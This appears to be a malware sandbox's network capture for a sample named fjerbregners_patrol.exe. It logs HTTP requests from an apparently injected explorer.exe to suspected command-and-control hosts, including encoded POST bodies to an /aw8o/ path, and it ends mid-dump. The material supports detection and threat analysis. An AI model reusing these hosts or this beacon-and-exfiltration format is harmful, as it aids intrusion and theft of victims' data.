                                                                                                                                                                                          1192.168.11.2049716142.250.185.129443C:\Users\user\Desktop\fjerbregners_patrol.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          10192.168.11.2049725162.0.239.14580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:20.162362099 CEST497OUTGET /aw8o/?P4=_n5TPHiTKZj&1NM6e=4wyyFbo3wf4GPkojX9lv2Hi85TpF3a9bJFCVb7ujVjad/QnKgAM8Rmx0lfLSMwhbZvHAQ1fpLn066tx6/q5vMcOgf2mjw6QkIA== HTTP/1.1
                                                                                                                                                                                          Host: www.sonokmall.info
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426536083 CEST498INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:20 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Content-Length: 38381
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426614046 CEST499INData Raw: 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 32 39 33 2e 34 29 20 72 6f 74 61 74
                                                                                                                                                                                          Data Ascii: <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426675081 CEST501INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 63 79 3d 22 38 31 30 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                                                                                                                                                                          Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426731110 CEST502INData Raw: 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78
                                                                                                                                                                                          Data Ascii: translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="t
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426840067 CEST503INData Raw: 63 78 3d 22 35 37 32 2e 35 22 20 63 79 3d 22 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74
                                                                                                                                                                                          Data Ascii: cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle c
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426899910 CEST505INData Raw: 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 34 38 22 20 63 79 3d 22 37 34 37 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28
                                                                                                                                                                                          Data Ascii: ill: #ffe029"/> <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" transform="translate(-260.6 373.2) rotate(-27.1)" style="fill
                                                                                                                                                                                          Aug 10, 2023 10:19:20.426958084 CEST506INData Raw: 61 74 65 28 2d 32 37 36 2e 39 20 33 35 35 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 34 2e
                                                                                                                                                                                          Data Ascii: ate(-276.9 355.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.7" cy="773.4" r="3.7" transform="transla
                                                                                                                                                                                          Aug 10, 2023 10:19:20.427117109 CEST507INData Raw: 38 22 20 63 79 3d 22 36 38 31 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 37 2e 33 20 33 33 36 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c
                                                                                                                                                                                          Data Ascii: 8" cy="681.2" r="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="translate(-243.8 328.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="558.2
                                                                                                                                                                                          Aug 10, 2023 10:19:20.427175999 CEST509INData Raw: 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 35 36 2e 33 22 20 63 79 3d 22 37 30 33 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
                                                                                                                                                                                          Data Ascii: ill: #ffe029"/> <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="552.7" cy="720.2" r="3.7" transform="translate(-267.5 331.1) rotate(-27.1)" style="fi
                                                                                                                                                                                          Aug 10, 2023 10:19:20.427232027 CEST510INData Raw: 2e 33 20 33 31 35 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 37 31 37
                                                                                                                                                                                          Data Ascii: .3 315.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.1" cy="704.7" r="3.7" transform="translate(-267.6
                                                                                                                                                                                          Aug 10, 2023 10:19:20.596180916 CEST511INData Raw: 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 30 2e 32 20 32 39 36 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a
                                                                                                                                                                                          Data Ascii: r="3.7" transform="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r="3.7" transform="translate(-245.7 290.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="477.7" cy="634.1" r


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          11192.168.11.2049726104.21.62.3080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:25.629587889 CEST538OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.zenturasolutions.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.zenturasolutions.com
                                                                                                                                                                                          Referer: http://www.zenturasolutions.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 67 59 5a 2f 36 54 4a 39 34 75 33 74 64 34 54 77 6f 7a 66 39 51 53 54 58 4c 54 59 6d 66 6a 77 48 53 41 58 42 66 46 41 37 47 52 79 2b 63 32 46 37 30 48 42 68 34 72 4b 71 62 38 71 2f 7a 62 44 70 64 47 66 6a 78 76 67 4e 59 31 63 68 54 45 41 62 51 4e 61 63 30 6d 4e 6a 4b 4e 6a 66 41 79 2b 6f 33 31 50 55 74 7a 6c 6e 71 61 55 4d 4d 6e 73 39 4d 4a 46 57 2f 34 74 4c 43 75 6d 76 4b 61 38 46 35 68 38 74 66 6c 35 4b 6a 45 30 56 6f 68 75 72 52 6f 52 55 2b 46 70 41 39 68 71 62 30 77 66 67 39 4c 68 65 71 55 39 55 57 69 57 6f 5a 6a 42 43 73 41 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=gYZ/6TJ94u3td4Twozf9QSTXLTYmfjwHSAXBfFA7GRy+c2F70HBh4rKqb8q/zbDpdGfjxvgNY1chTEAbQNac0mNjKNjfAy+o31PUtzlnqaUMMns9MJFW/4tLCumvKa8F5h8tfl5KjE0VohurRoRU+FpA9hqb0wfg9LheqU9UWiWoZjBCsA==
                                                                                                                                                                                          Aug 10, 2023 10:19:25.673523903 CEST539INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:25 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: ch1c=b
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WIC0BzL11LwXCwi3RUqzo1z5e3W2Zr6joZY7X1k%2BkePuVwy3%2F35Y4jLlPkM8zZ9EPDzsghR8sgIP7%2BLeCDtNQV7g9k%2F33CDCtzyvxJxbXcMnTLC%2FAQ8g61oXlpIjgy%2BKTYNyw2QarVgOa%2BI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 7f46d0553db03734-FRA
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                          Data Ascii: 19
                                                                                                                                                                                          Aug 10, 2023 10:19:25.673584938 CEST539INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          12192.168.11.2049727104.21.62.3080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:28.156085014 CEST540OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.zenturasolutions.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.zenturasolutions.com
                                                                                                                                                                                          Referer: http://www.zenturasolutions.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 67 59 5a 2f 36 54 4a 39 34 75 33 74 63 62 62 77 34 69 66 39 42 43 54 49 45 7a 59 6d 56 44 77 44 53 41 62 42 66 45 45 72 46 6e 4b 2b 63 57 31 37 36 69 74 68 32 4c 4b 71 44 4d 71 36 39 37 44 59 64 47 54 42 78 71 67 4e 59 31 49 68 54 33 34 62 57 39 61 62 38 47 4e 67 61 39 6a 53 45 79 2b 79 33 31 53 2f 74 79 68 6e 70 72 34 4d 64 55 45 39 4a 59 46 58 75 6f 74 4e 45 75 6d 77 45 36 38 62 35 68 77 62 66 6c 78 77 6a 32 6f 56 6f 42 4f 72 51 6f 52 58 30 31 70 48 69 52 72 35 36 42 71 35 33 4e 51 67 31 6b 78 47 59 6a 72 55 63 42 68 4f 34 75 50 67 64 43 72 45 77 58 54 37 42 2f 77 4b 71 43 69 53 4c 41 4c 42 4a 61 65 47 79 30 48 61 41 2f 4a 46 53 50 61 52 45 6d 6e 69 62 67 78 47 33 6c 79 51 65 37 66 7a 56 68 38 4f 67 66 7a 53 48 47 4f 73 30 4e 4e 61 59 31 30 31 56 6e 63 71 42 44 33 33 49 4b 38 34 67 65 64 56 2f 6d 43 66 51 6b 43 59 76 6f 48 6c 39 78 31 77 67 34 50 75 4a 31 73 6e 2b 56 57 46 68 7a 76 77 70 4e 78 45 4a 61 7a 2b 4f 6e 6c 67 51 6f 39 4b 35 68 31 4c 54 31 45 45 45 32 33 68 56 31 79 47 69 52 47 54 69 46 57 33 43 45 43 38 72 36 32 77 6a 42 67 41 6a 34 48 73 32 4f 76 71 6b 78 39 2b 67 6f 37 43 66 52 33 56 48 7a 36 69 42 65 74 30 69 73 58 65 49 61 61 64 4f 52 75 61 7a 38 4b 43 49 30 68 76 69 2f 49 70 35 4d 2b 57 52 6d 75 6c 4d 34 58 4e 50 6b 42 7a 58 76 31 75 43 4f 4e 35 6a 4b 58 53 52 54 46 78 39 67 30 6c 53 57 64 75 55 62 42 50 75 62 45 48 46 7a 52 48 32 61 48 7a 48 77 68 61 7a 45 4f 49 6a 6a 36 35 5a 31 4d 4c 44 44 6b 78 79 2f 61 32 63 2b 47 2b 54 47 41 45 32 61 6b 54 42 66 35 6e 54 34 2f 54 45 52 6d 6b 79 74 34 30 33 61 65 38 4e 79 59 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=gYZ/6TJ94u3tcbbw4if9BCTIEzYmVDwDSAbBfEErFnK+cW176ith2LKqDMq697DYdGTBxqgNY1IhT34bW9ab8GNga9jSEy+y31S/tyhnpr4MdUE9JYFXuotNEumwE68b5hwbflxwj2oVoBOrQoRX01pHiRr56Bq53NQg1kxGYjrUcBhO4uPgdCrEwXT7B/wKqCiSLALBJaeGy0HaA/JFSPaREmnibgxG3lyQe7fzVh8OgfzSHGOs0NNaY101VncqBD33IK84gedV/mCfQkCYvoHl9x1wg4PuJ1sn+VWFhzvwpNxEJaz+OnlgQo9K5h1LT1EEE23hV1yGiRGTiFW3CEC8r62wjBgAj4Hs2Ovqkx9+go7CfR3VHz6iBet0isXeIaadORuaz8KCI0hvi/Ip5M+WRmulM4XNPkBzXv1uCON5jKXSRTFx9g0lSWduUbBPubEHFzRH2aHzHwhazEOIjj65Z1MLDDkxy/a2c+G+TGAE2akTBf5nT4/TERmkyt403ae8NyY=
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193677902 CEST541INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:28 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: ch1c=b
                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none';
                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=08hJEuu6T27%2BSUQYPlwRKiGHxgpbcPZZC84Hlp8RLKq4Fw10VdHi5u0RxNw9cnioTv6V0hmlAKyxuZe9W%2BQHZtoCWayidSrr6djv%2FtqaxjM7H3FSzoqrcZ1q5kaYCdTAZL9iKzaRZYwgu2E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 7f46d064f9c03608-FRA
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                          Data Ascii: 19
                                                                                                                                                                                          Aug 10, 2023 10:19:28.193690062 CEST541INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          13192.168.11.2049728104.21.62.3080C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:30.687652111 CEST548OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.zenturasolutions.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.zenturasolutions.com
                                                                                                                                                                                          Referer: http://www.zenturasolutions.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 67 59 5a 2f 36 54 4a 39 34 75 33 74 63 62 62 77 34 69 66 39 42 43 54 49 45 7a 59 6d 56 44 77 44 53 41 62 42 66 45 45 72 46 6b 71 2b 64 6c 39 37 36 42 56 68 31 4c 4b 71 64 38 71 37 39 37 44 2f 64 47 4c 46 78 71 64 34 59 32 77 68 53 6b 77 62 57 4f 79 62 37 47 4e 6c 47 74 6a 63 41 79 2f 7a 33 31 4f 72 74 79 6c 64 71 61 4d 4d 4d 6d 63 39 43 4b 74 57 6d 59 74 4c 45 75 6d 38 53 36 38 54 35 68 30 4c 66 6c 39 77 6a 30 63 56 70 33 4b 72 57 2f 4e 58 39 46 70 45 6f 78 72 79 30 68 71 36 33 4c 39 5a 31 6b 78 73 59 68 48 55 63 43 70 4f 37 70 6a 6a 65 69 72 45 73 48 54 36 46 2f 38 4f 71 43 75 30 4c 41 2f 42 4a 59 65 47 7a 55 48 61 57 36 38 54 55 76 61 58 54 32 6e 35 52 41 39 65 33 6c 6d 63 65 37 4c 7a 56 52 6f 4f 69 6f 76 53 43 6b 6d 73 35 4e 4e 55 57 56 30 71 63 48 64 7a 42 44 6e 72 49 4c 52 4e 67 65 70 56 2b 43 57 66 62 6e 61 62 6e 6f 48 76 34 78 31 6c 78 6f 4c 69 4a 30 63 7a 2b 56 57 56 68 32 66 77 71 39 42 45 4b 62 7a 39 4e 33 6c 6e 4d 6f 39 66 7a 41 4a 57 54 31 5a 49 45 32 50 78 56 32 65 47 69 78 47 54 6e 69 43 30 56 6b 43 37 32 71 32 69 75 68 68 66 6a 34 4c 4b 32 4b 2b 58 6b 41 42 2b 68 63 62 43 62 42 33 53 43 54 36 2b 4c 2b 73 2b 6d 73 58 65 49 61 66 73 4f 52 69 61 79 50 57 43 49 44 64 76 79 63 51 70 37 4d 2b 4d 52 6d 75 77 4d 34 61 7a 50 6b 35 52 58 76 45 31 43 49 64 35 6a 62 48 53 64 79 46 79 34 51 30 73 57 57 64 35 62 37 39 2b 75 62 49 66 46 7a 68 39 32 71 72 7a 45 77 78 61 6b 30 4f 4c 6f 6a 36 2b 50 6c 4e 49 56 44 35 75 79 2f 48 4c 63 36 50 68 54 46 41 45 6d 75 6b 50 5a 37 70 33 4b 34 76 4e 43 32 65 42 74 4d 45 39 67 5a 2b 6e 61 46 6f 43 6d 4a 41 71 41 4c 4e 70 47 61 36 52 4b 64 55 78 64 49 7a 4b 47 73 61 71 72 39 35 44 36 31 6a 34 6d 59 43 46 77 79 4c 6e 7a 53 61 6f 2b 61 66 30 6e 58 6b 30 57 6e 37 52 76 64 71 44 4e 41 67 6f 4b 6b 33 42 71 56 52 35 53 53 77 61 58 46 73 4c 71 69 57 59 58 30 72 4d 35 4a 2b 76 5a 2b 51 79 53 48 79 68 71 56 7a 6e 37 37 32 62 6d 41 74 48 65 51 62 72 76 30 32 33 73 4e 53 62 49 58 30 7a 79 2b 33 76 53 71 38 42 49 47 66 69 74 76 4f 6b 34 67 35 61 57 38 71 55 49 4f 78 6c 63 6d 52 50 4f 67 6b 72 55 51 6d 57 6d 63 55 47 58 46 4b 57 7a 49 76 38 50 79 6c 30 73 30 35 71 6f 4b 57 73 59 6f 49 34 58 59 4f 58 6d 62 32 36 73 48 48 7a 39 64 36 45 57 57 33 46 41 6b 56 68 59 4b 30 34 75 41 78 59 34 49 62 6f 33 43 4b 4b 59 78 52 47 64 79 38 